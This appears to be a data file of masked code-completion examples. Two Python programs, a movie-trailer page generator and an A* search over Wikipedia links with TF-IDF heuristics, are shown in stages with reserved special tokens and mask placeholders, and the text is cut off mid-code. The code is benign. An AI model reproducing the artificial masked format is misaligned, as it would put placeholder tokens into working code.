code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
toy_story = media.Movie('Toy Story',
'A story of a boy and his toys that come to life',
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>'
, 'https://youtu.be/KYz2wyBy3kc')
avatar = media.Movie('Avatar', 'A marine on an alien planet',
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>'
, 'https://youtu.be/5PSNL1qE6VY')
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
import media
import fresh_tomatoes
toy_story = media.Movie('Toy Story',
'A story of a boy and his toys that come to life',
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>'
, 'https://youtu.be/KYz2wyBy3kc')
avatar = media.Movie('Avatar', 'A marine on an alien planet',
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>'
, 'https://youtu.be/5PSNL1qE6VY')
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
<|reserved_special_token_1|>
import media
import fresh_tomatoes
toy_story = media.Movie("Toy Story",
"A story of a boy and his toys that come to life",
'<p><a href="https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg" alt="The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\'s title. The background shows the cloud wallpaper featured in the bedroom."></a><br>By From <a rel="nofollow" class="external text" href="http://www.impawards.com/1995/toy_story_ver1.html">impawards</a>., <a href="https://en.wikipedia.org/w/index.php?curid=26009601">Link</a></p>',
"https://youtu.be/KYz2wyBy3kc")
avatar = media.Movie("Avatar",
"A marine on an alien planet",
'<p><a href="https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg"><img src="https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg" alt="Avatar-Teaser-Poster.jpg"></a><br>By Source, <a href="//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg" title="Fair use of copyrighted material in the context of Avatar (2009 film)">Fair use</a>, <a href="https://en.wikipedia.org/w/index.php?curid=23732044">Link</a></p>',
"https://youtu.be/5PSNL1qE6VY")
# print(avatar.storyline)
# avatar.show_trailer()
movies = [toy_story, avatar]
fresh_tomatoes.open_movies_page(movies)
# print(media.Movie.__doc__)
# print(media.Movie.__name__)
# print(media.Movie.__module__)
|
flexible
|
{
"blob_id": "e2f6e6e872f95471ebbc8b25bde08247fe8f7e61",
"index": 8829,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfresh_tomatoes.open_movies_page(movies)\n",
"step-3": "<mask token>\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy and his toys that come to life',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>'\n , 'https://youtu.be/KYz2wyBy3kc')\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>'\n , 'https://youtu.be/5PSNL1qE6VY')\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n",
"step-4": "import media\nimport fresh_tomatoes\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy and his toys that come to life',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>'\n , 'https://youtu.be/KYz2wyBy3kc')\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>'\n , 'https://youtu.be/5PSNL1qE6VY')\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n",
"step-5": "import media\nimport fresh_tomatoes\n\ntoy_story = media.Movie(\"Toy Story\",\n \"A story of a boy and his toys that come to life\",\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Toy_Story.jpg#/media/File:Toy_Story.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\" alt=\"The poster features Woody anxiously holding onto Buzz Lightyear as he flies in Andy\\'s room. Below them sitting on the bed are Bo Peep, Mr. Potato Head, Troll, Hamm, Slinky, Sarge and Rex. In the lower right center of the image is the film\\'s title. The background shows the cloud wallpaper featured in the bedroom.\"></a><br>By From <a rel=\"nofollow\" class=\"external text\" href=\"http://www.impawards.com/1995/toy_story_ver1.html\">impawards</a>., <a href=\"https://en.wikipedia.org/w/index.php?curid=26009601\">Link</a></p>',\n \"https://youtu.be/KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\",\n \"A marine on an alien planet\",\n '<p><a href=\"https://en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg#/media/File:Avatar-Teaser-Poster.jpg\"><img src=\"https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg\" alt=\"Avatar-Teaser-Poster.jpg\"></a><br>By Source, <a href=\"//en.wikipedia.org/wiki/File:Avatar-Teaser-Poster.jpg\" title=\"Fair use of copyrighted material in the context of Avatar (2009 film)\">Fair use</a>, <a href=\"https://en.wikipedia.org/w/index.php?curid=23732044\">Link</a></p>',\n \"https://youtu.be/5PSNL1qE6VY\")\n\n# print(avatar.storyline)\n# avatar.show_trailer()\nmovies = [toy_story, avatar]\nfresh_tomatoes.open_movies_page(movies)\n# print(media.Movie.__doc__)\n# print(media.Movie.__name__)\n# print(media.Movie.__module__)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from __future__ import annotations
import typing
import requests
import heapq
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import TfidfVectorizer
from bs4 import BeautifulSoup
from wikiAPI import get_JSON, get_intro, compare_titles
from typing import List, Type, Callable
def heuristic_0(a: str, b: str) -> float:
return 2
def heuristic_1(a: str, b: str) -> float:
"""
Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated
term-document matrices of the article. The heuristic in this case is purely semantic.
The HTML enriched query for the JSON is:
https://en.wikipedia.org/w/api.php?action=parse&page=TITLE&prop=text&formatversion=2&format=json
"""
query = "https://en.wikipedia.org/w/api.php?action=parse&page=TEMP&prop=text&formatversion=2&format=json"
startTitle = (a.replace(" ", "%20")).replace("&", "%26")
endTitle = (b.replace(" ", "%20")).replace("&", "%26")
startURL = (query.replace("TEMP", startTitle))
endURL = (query.replace("TEMP", endTitle))
# text processing using SOUP
initialSoup = BeautifulSoup(get_JSON(startURL)['parse']['text'], 'html.parser')
finalSoup = BeautifulSoup(get_JSON(endURL)['parse']['text'], 'html.parser')
# generate term-document matrices
corpus = [initialSoup.get_text().replace('\n', ' '), finalSoup.get_text().replace('\n', ' ')]
vect = TfidfVectorizer()
mat = vect.fit_transform(corpus)
# return cosine similarity
return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2
def heuristic_2(a: str, b: str) -> float:
"""
Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated
term-document matrices of the article. The heuristic in this case is purely semantic.
The HTML enriched query for the JSON is:
https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1
"""
# generate term-document matrices
if get_intro(a) == "" or get_intro(b) == "":
return 2
else:
corpus = [get_intro(a), get_intro(b)]
vect = TfidfVectorizer()
mat = vect.fit_transform(corpus)
# return cosine similarity
return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2
# def semantic_similarity(a: str, b: str) -> float:
# web_model = WebBertSimilarity(device='cpu', batch_size=10)
# return web_model.predict([(a, b)])
class Article:
"""
This is the article class that represents each Wikipedia article.
Instance Variables:
- title: str that represents the title of the article
- target: the final target given by the user
- g:
- f:
"""
title: str
target: str
g: float
f: float
parent: typing.Union[Article, Type(None)]
heuristic: Callable[[str, str], float]
def __init__(self, title: str, target: str, parent: typing.Union[Article, Type(None)], heuristic: Callable[[str, str], float] ):
"""
Initializes based on [urls/titles/nodes]
"""
self.title = title
self.target = target
self.heuristic = heuristic
if parent:
self.parent = parent
self.g = parent.g + 1
else:
self.parent = None
self.g = 0
h = self.heuristic(title, target)
self.f = self.g + h
def get_children(self, cont: typing.Union[str, Type(None)]) -> List[str]:
"""
Return list of connected (children) article object using the wikipedia API functions.
"""
s = requests.Session()
url = "https://en.wikipedia.org/w/api.php"
if cont is None:
params = {
"action": "query",
"format": "json",
"titles": self.title,
"prop": "links",
"pllimit": "max"
}
else:
params = {
"action": "query",
"format": "json",
"titles": self.title,
"prop": "links",
"pllimit": "max",
"plcontinue": cont
}
titles_so_far = []
r = s.get(url=url, params=params)
data = r.json()
pages = data["query"]["pages"]
for k, v in pages.items():
if "links" not in v:
return []
for l in v["links"]:
titles_so_far.append(l["title"])
if "batchcomplete" in data:
return titles_so_far
else:
contHolder = data["continue"]["plcontinue"]
titles_so_far.extend(self.get_children(contHolder))
return titles_so_far
# return [Article(child, self.target, self.title) for child in titles_so_far]
def get_first_x(self, lst: List, x: int) -> List:
lst_so_far = []
for i in range(x):
lst_so_far.append(lst[i])
return lst_so_far
def __lt__(self, other):
return self.f < other.f
def __le__(self, other):
return self.f <= other.f
def __eq__(self, other):
return compare_titles(self.title, other.title)
def __ne__(self, other):
return not compare_titles(self.title, other.title)
def __gt__(self, other):
return self.f > other.f
def __ge__(self, other):
return self.f >= other.f
class PQ:
"""
MinHeap implementation of a priority queue for A* search.
"""
heap = []
def __init__(self):
self.heap = []
def insert(self, to_insert: Article) -> None:
"""
Insert new element in Priority queue
"""
heapq.heappush(self.heap, to_insert)
def pop(self) -> Article:
"""
pops minimum element from priority queue
"""
return heapq.heappop(self.heap)
def a_star(source: str, target: str, heuristic: Callable[[str, str], float]) -> list:
"""
Returns path from source to target using A* search algorithm.
"""
visited: set = set((source))
cur: Article = Article(source, target, None, heuristic)
queue = PQ()
while not compare_titles(cur.title, target):
nexts = cur.get_children(None)
for next in nexts:
if next not in visited:
article = Article(next, target, cur, heuristic)
queue.insert(article)
visited.add(next)
print(article.f, article.title)
cur = queue.pop()
print("CUR:", cur.f, cur.title)
path = [cur.title]
while path[0] != source:
cur = cur.parent
path.insert(0, cur.title)
return path
# print(a_star("Dog", "Aardwolf", heuristic_2))
|
normal
|
{
"blob_id": "1fad591fde707c73bd52aa8518828c8b8be9cd32",
"index": 2283,
"step-1": "<mask token>\n\n\nclass Article:\n <mask token>\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n <mask token>\n <mask token>\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n <mask token>\n <mask token>\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n 
\"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Article:\n <mask token>\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n <mask token>\n\n def 
__ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far = []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return 
self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef heuristic_2(a: str, b: str) ->float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1\n \"\"\"\n if get_intro(a) == '' or get_intro(b) == '':\n return 2\n else:\n corpus = [get_intro(a), get_intro(b)]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[\n Article, Type(None)], heuristic: Callable[[str, str], float]):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) ->List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n url = 'https://en.wikipedia.org/w/api.php'\n if cont is None:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max'}\n else:\n params = {'action': 'query', 'format': 'json', 'titles': self.\n title, 'prop': 'links', 'pllimit': 'max', 'plcontinue': cont}\n titles_so_far 
= []\n r = s.get(url=url, params=params)\n data = r.json()\n pages = data['query']['pages']\n for k, v in pages.items():\n if 'links' not in v:\n return []\n for l in v['links']:\n titles_so_far.append(l['title'])\n if 'batchcomplete' in data:\n return titles_so_far\n else:\n contHolder = data['continue']['plcontinue']\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n def get_first_x(self, lst: List, x: int) ->List:\n lst_so_far = []\n for i in range(x):\n lst_so_far.append(lst[i])\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) ->None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) ->Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\n<mask token>\n",
"step-5": "from __future__ import annotations\nimport typing\nimport requests\nimport heapq\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom bs4 import BeautifulSoup\nfrom wikiAPI import get_JSON, get_intro, compare_titles\nfrom typing import List, Type, Callable\n\n\ndef heuristic_0(a: str, b: str) -> float:\n return 2\n\n\ndef heuristic_1(a: str, b: str) -> float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=parse&page=TITLE&prop=text&formatversion=2&format=json\n \"\"\"\n query = \"https://en.wikipedia.org/w/api.php?action=parse&page=TEMP&prop=text&formatversion=2&format=json\"\n startTitle = (a.replace(\" \", \"%20\")).replace(\"&\", \"%26\")\n endTitle = (b.replace(\" \", \"%20\")).replace(\"&\", \"%26\")\n startURL = (query.replace(\"TEMP\", startTitle))\n endURL = (query.replace(\"TEMP\", endTitle))\n # text processing using SOUP\n initialSoup = BeautifulSoup(get_JSON(startURL)['parse']['text'], 'html.parser')\n finalSoup = BeautifulSoup(get_JSON(endURL)['parse']['text'], 'html.parser')\n # generate term-document matrices\n corpus = [initialSoup.get_text().replace('\\n', ' '), finalSoup.get_text().replace('\\n', ' ')]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n # return cosine similarity\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\ndef heuristic_2(a: str, b: str) -> float:\n \"\"\"\n Returns predicted cost (distance) from two titles a to b, through the cosine similarity of two generated\n term-document matrices of the article. 
The heuristic in this case is purely semantic.\n\n The HTML enriched query for the JSON is:\n https://en.wikipedia.org/w/api.php?action=query&titles=TITLE&prop=extracts&format=json&exintro=1\n \"\"\"\n # generate term-document matrices\n if get_intro(a) == \"\" or get_intro(b) == \"\":\n return 2\n else:\n corpus = [get_intro(a), get_intro(b)]\n vect = TfidfVectorizer()\n mat = vect.fit_transform(corpus)\n # return cosine similarity\n return abs(1 - cosine_similarity(mat[0:1], mat)[0][1]) * 2\n\n\n# def semantic_similarity(a: str, b: str) -> float:\n # web_model = WebBertSimilarity(device='cpu', batch_size=10)\n # return web_model.predict([(a, b)])\n\n\nclass Article:\n \"\"\"\n This is the article class that represents each Wikipedia article.\n\n Instance Variables:\n - title: str that represents the title of the article\n - target: the final target given by the user\n - g:\n - f:\n \"\"\"\n title: str\n target: str\n g: float\n f: float\n parent: typing.Union[Article, Type(None)]\n heuristic: Callable[[str, str], float]\n\n def __init__(self, title: str, target: str, parent: typing.Union[Article, Type(None)], heuristic: Callable[[str, str], float] ):\n \"\"\"\n Initializes based on [urls/titles/nodes]\n \"\"\"\n self.title = title\n self.target = target\n self.heuristic = heuristic\n\n if parent:\n self.parent = parent\n self.g = parent.g + 1\n else:\n self.parent = None\n self.g = 0\n\n h = self.heuristic(title, target)\n self.f = self.g + h\n\n def get_children(self, cont: typing.Union[str, Type(None)]) -> List[str]:\n \"\"\"\n Return list of connected (children) article object using the wikipedia API functions.\n \"\"\"\n s = requests.Session()\n\n url = \"https://en.wikipedia.org/w/api.php\"\n\n if cont is None:\n params = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"titles\": self.title,\n \"prop\": \"links\",\n \"pllimit\": \"max\"\n }\n else:\n params = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"titles\": self.title,\n \"prop\": 
\"links\",\n \"pllimit\": \"max\",\n \"plcontinue\": cont\n }\n\n titles_so_far = []\n\n r = s.get(url=url, params=params)\n data = r.json()\n\n pages = data[\"query\"][\"pages\"]\n\n for k, v in pages.items():\n if \"links\" not in v:\n return []\n\n for l in v[\"links\"]:\n titles_so_far.append(l[\"title\"])\n\n if \"batchcomplete\" in data:\n return titles_so_far\n else:\n contHolder = data[\"continue\"][\"plcontinue\"]\n titles_so_far.extend(self.get_children(contHolder))\n return titles_so_far\n\n # return [Article(child, self.target, self.title) for child in titles_so_far]\n\n def get_first_x(self, lst: List, x: int) -> List:\n lst_so_far = []\n\n for i in range(x):\n lst_so_far.append(lst[i])\n\n return lst_so_far\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __le__(self, other):\n return self.f <= other.f\n\n def __eq__(self, other):\n return compare_titles(self.title, other.title)\n\n def __ne__(self, other):\n return not compare_titles(self.title, other.title)\n\n def __gt__(self, other):\n return self.f > other.f\n\n def __ge__(self, other):\n return self.f >= other.f\n\nclass PQ:\n \"\"\"\n MinHeap implementation of a priority queue for A* search.\n \"\"\"\n heap = []\n\n def __init__(self):\n self.heap = []\n\n def insert(self, to_insert: Article) -> None:\n \"\"\"\n Insert new element in Priority queue\n \"\"\"\n heapq.heappush(self.heap, to_insert)\n\n def pop(self) -> Article:\n \"\"\"\n pops minimum element from priority queue\n \"\"\"\n return heapq.heappop(self.heap)\n\n\ndef a_star(source: str, target: str, heuristic: Callable[[str, str], float]) -> list:\n \"\"\"\n Returns path from source to target using A* search algorithm.\n \"\"\"\n visited: set = set((source))\n cur: Article = Article(source, target, None, heuristic)\n queue = PQ()\n\n while not 